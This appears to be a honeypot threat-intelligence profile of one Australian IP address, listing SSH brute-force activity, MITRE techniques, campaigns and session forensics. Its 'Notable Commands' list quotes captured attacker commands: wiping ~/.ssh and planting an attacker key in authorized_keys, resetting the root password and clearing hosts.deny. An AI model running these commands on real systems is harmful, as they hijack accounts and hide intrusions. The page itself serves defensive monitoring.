IntrusionLabs IntrusionLabs
← Back to feed

203.221.12.133

Threat Confidence
50%
Location
🇦🇺 AU / Melbourne
ASN
AS7545 · TPG Telecom Limited
Cloud Provider
Total Events
273
Top 10% by volume
Agent Count
1
First / Last Seen
2026-04-01 23:28 — 2026-04-09 20:44
Attack Types
ssh:bruteforce
MITRE ATT&CK Techniques
Reconnaissance
T1595
Initial Access
T1078
Defense Evasion
T1070.004
Credential Access
T1110 T1110.001
Discovery
T1046 T1082
Command and Control
T1105
External Corroboration
Not flagged by any external feeds
Campaigns
Multi-Agent Scan SCAN Active medium
156 IPs 285792 events
2026-04-06 — ongoing · 156 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
188 IPs 290814 events
2026-04-06 — ongoing · 188 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
151 IPs 266201 events
2026-03-08 — ongoing · 151 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
152 IPs 266974 events
2026-03-05 — ongoing · 152 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
83 IPs 242357 events
2026-03-02 — ongoing · 83 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Multi-Agent Scan SCAN Active medium
149 IPs 265769 events
2026-03-01 — ongoing · 149 IPs independently targeted the same honeypot sensors within a 24-hour window. Scanning the same targets in close …
Session Forensics
scanner ×18 malware_dropper ×7 credential_harvester ×11 opportunistic_bruter ×5
Sessions
41 (12 with login)
Avg Depth Score
0.39
Commands Executed
34
Files Downloaded
9
Notable Commands
  • cd ~; chattr -ia .ssh; lockr -ia .ssh
  • lockr -ia .ssh
  • cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
  • cat /proc/cpuinfo | grep name | wc -l
  • echo "root:7ZKE8iSZ3st3"|chpasswd|bash
  • rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
  • cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
  • cat /proc/cpuinfo | grep model | grep name | wc -l
  • top
  • uname
Fingerprints
HASSH
03a80b21afa810682a776a7d42e5e6fb
SSH Client
SSH-2.0-libssh_0.11.1
Evidence Timeline
Scanner 9ef6c9c2ddd5 w4m_singapore_01 · 2026-04-10 14:57
15%
Loading events...
Malware Dropper 9c9760a6ce71 w4m_seattle_01 · 2026-04-09 20:44
3 1 1 100%
Loading events...
Opportunistic Bruter fb3e12476dd2 w4m_seattle_01 · 2026-04-09 20:44
1 50%
Loading events...
Credential Harvester bef9e4199f08 w4m_seattle_01 · 2026-04-09 20:44
1 35%
Loading events...
Credential Harvester 4681672dd588 w4m_seattle_01 · 2026-04-09 20:39
1 35%
Loading events...
Malware Dropper 352f04a3b059 w4m_seattle_01 · 2026-04-09 20:33
13 2 1 100%
Loading events...
Scanner 6dd6d10423fd w4m_seattle_01 · 2026-04-09 20:33
15%
Loading events...
Credential Harvester 35d8d4ad6cde w4m_seattle_01 · 2026-04-09 20:33
1 35%
Loading events...
Scanner 0dbf559b9035 w4m_seattle_01 · 2026-04-09 20:28
15%
Loading events...
Scanner 1622941f4141 w4m_seattle_01 · 2026-04-09 20:22
15%
Loading events...
Scanner e563666cf853 w4m_seattle_01 · 2026-04-09 20:17
15%
Loading events...
Scanner 93a16b6b9498 w4m_seattle_01 · 2026-04-09 20:11
15%
Loading events...
Credential Harvester 19883e83dc0f w4m_seattle_01 · 2026-04-09 20:06
1 35%
Loading events...
Credential Harvester 60ffe4a55e67 w4m_seattle_01 · 2026-04-09 20:01
1 35%
Loading events...
Scanner ef94dd4a4a79 w4m_seattle_01 · 2026-04-09 19:55
15%
Loading events...
Malware Dropper 4597c9740225 w4m_seattle_01 · 2026-04-09 19:50
6 2 1 100%
Loading events...
Scanner 0d27493aba64 w4m_seattle_01 · 2026-04-09 19:50
15%
Loading events...
Scanner 7397575bb264 w4m_seattle_01 · 2026-04-09 19:50
15%
Loading events...
Malware Dropper 1316b55e8d48 w4m_seattle_01 · 2026-04-09 19:44
3 1 1 100%
Loading events...
Opportunistic Bruter b634a8046fa3 w4m_seattle_01 · 2026-04-09 19:45
1 50%
Loading events...
Scanner c5bf2c382bdc w4m_seattle_01 · 2026-04-09 19:44
15%
Loading events...
Scanner d242f943db85 w4m_seattle_01 · 2026-04-09 19:39
15%
Loading events...
Scanner 4c031f0c54a6 w4m_seattle_01 · 2026-04-09 19:33
15%
Loading events...
Credential Harvester 3d4866ec8b1e w4m_seattle_01 · 2026-04-09 19:28
1 35%
Loading events...
Scanner 59a26378a784 w4m_seattle_01 · 2026-04-09 19:23
15%
Loading events...
Scanner d59756fa0d7a w4m_seattle_01 · 2026-04-09 19:17
15%
Loading events...
Credential Harvester 4ff0975b1f21 w4m_seattle_01 · 2026-04-09 19:12
1 35%
Loading events...
Credential Harvester 918663223a3c w4m_seattle_01 · 2026-04-09 19:06
1 35%
Loading events...
Scanner 8c2795a322c3 w4m_seattle_01 · 2026-04-09 19:01
15%
Loading events...
Scanner 7afc38cba8be w4m_seattle_01 · 2026-04-09 18:55
15%
Loading events...
Scanner a1efecc79be3 w4m_seattle_01 · 2026-04-09 18:50
15%
Loading events...
Opportunistic Bruter de76a71151c7 w4m_seattle_01 · 2026-04-09 18:44
1 50%
Loading events...
Malware Dropper 228974982756 w4m_seattle_01 · 2026-04-09 18:43
3 1 1 100%
Loading events...
Credential Harvester 56a643443dd6 w4m_seattle_01 · 2026-04-09 18:44
1 35%
Loading events...
Opportunistic Bruter b0918f78ed88 w4m_seattle_01 · 2026-04-09 18:38
1 50%
Loading events...
Malware Dropper 13de4d73ab07 w4m_seattle_01 · 2026-04-09 18:38
3 1 1 100%
Loading events...
Scanner 89c6090b33aa w4m_seattle_01 · 2026-04-09 18:38
15%
Loading events...
Credential Harvester b6ff476fc87a w4m_seattle_01 · 2026-04-09 18:30
1 35%
Loading events...
Opportunistic Bruter 577125ede761 w4m_seattle_01 · 2026-04-01 23:28
1 50%
Loading events...
Malware Dropper 73b515ec7e02 w4m_seattle_01 · 2026-04-01 23:28
3 1 1 100%
Loading events...
Credential Harvester 34c804fff3f4 w4m_seattle_01 · 2026-04-01 23:28
1 35%
Loading events...